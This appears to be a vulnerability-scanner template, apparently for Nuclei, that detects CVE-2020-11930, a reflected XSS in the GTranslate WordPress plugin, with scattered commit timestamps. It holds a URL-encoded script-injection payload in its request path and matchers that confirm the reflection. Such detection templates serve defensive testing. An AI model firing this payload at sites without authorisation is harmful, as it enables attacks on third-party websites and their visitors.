2021-06-21 08:41:20 +00:00
id : CVE-2020-11930
info :
name : WordPress Plugin "Translate WordPress with GTranslate" (gtranslate) XSS
author : dhiyaneshDK
severity : medium
description : |
The GTranslate plugin before 2.8.52 for WordPress was vulnerable to an Unauthenticated Reflected XSS vulnerability via a crafted link. This requires use of the hreflang tags feature within a sub-domain or sub-directory paid option.
2021-08-18 11:37:49 +00:00
reference :
2021-06-21 08:41:20 +00:00
- https://wpscan.com/vulnerability/10181
- https://payatu.com/blog/gaurav/analysis-of-cve-2020-11930:-reflected-xss-in-gtranslate-wordpress-module
2022-05-17 09:18:12 +00:00
- https://plugins.trac.wordpress.org/changeset/2245581/gtranslate
- https://plugins.trac.wordpress.org/changeset/2245591/gtranslate
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 6.1
2021-09-10 11:26:40 +00:00
cve-id : CVE-2020-11930
cwe-id : CWE-79
2022-04-22 10:38:41 +00:00
tags : cve,cve2020,wordpress,xss,plugin
2021-06-21 08:41:20 +00:00
requests :
- method : GET
path :
2021-06-21 12:39:16 +00:00
- '{{BaseURL}}/does_not_exist"%22%3E%3Cscript%3Ealert("XSS")%3C/script%3E<img%20src=x'
2021-06-21 08:41:20 +00:00
matchers-condition : and
matchers :
- type : word
part : body
words :
2021-06-21 08:45:45 +00:00
- '<script>alert("XSS")</script>'
2021-06-21 08:41:20 +00:00
- type : word
part : header
words :
- "text/html"
- type : status
status :
- 200